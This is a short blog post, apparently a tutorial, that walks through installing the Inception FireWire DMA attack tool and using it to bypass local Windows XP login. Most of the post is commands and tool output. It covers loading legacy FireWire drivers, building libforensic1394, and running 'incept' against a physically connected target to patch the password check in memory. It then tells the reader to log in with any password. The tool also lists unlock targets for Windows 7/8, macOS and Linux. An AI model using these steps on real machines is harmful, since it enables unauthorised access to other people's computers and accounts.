# Bypass local authentication with Inception


Introduction

Inception

Configuration and installation

# cat /etc/modprobe.d/blacklist-firewire.conf
# Select the legacy firewire stack over the new CONFIG_FIREWIRE one.

blacklist ohci1394
blacklist sbp2
blacklist dv1394
blacklist raw1394
blacklist video1394

#blacklist firewire-ohci
#blacklist firewire-sbp2
# update-initramfs -k all -u
# reboot
# lsmod | grep -e firewire -e 1394
firewire_sbp2          15041  0 
firewire_net           13560  0 
ieee1394               94771  1 sbp2
firewire_ohci          24959  0 
firewire_core          51857  3 firewire_sbp2,firewire_net,firewire_ohci
crc_itu_t               1715  1 firewire_cor
# apt-get install git cmake python3 g++
# libforensic1394="http://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz"
# wget --no-check-certificate $libforensic1394
# tar xzvf libforensic1394-0.2.tar.gz
# cd libforensic1394-0.2
# cmake CMakeLists.txt
# make install
# cd python
# python3 setup.py install
# cd
# git clone https://github.com/carmaa/inception.git
# cd inception
# ./setup.py install
# cd

Bypassing Windows XP local authentication

1. Connect a firewire cable (4/4 or 4/6 pin) between your computer and the target.
2. Execute the tool:

# incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.2 (C) Carsten Maartmann-Moe 2012

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 4
[*] Selected target: Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] DMA shields should be down by now. Attacking...
[*] Searching,  334 MiB so far
[*] Signature found at 0x14eb7862 (in page # 85687)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

3. Login into the target computer using a existing user and the password you prefer.

1 comment:

Alguien said...

Nivel de paranoia aumentando... ;)
Un abrazo.
T.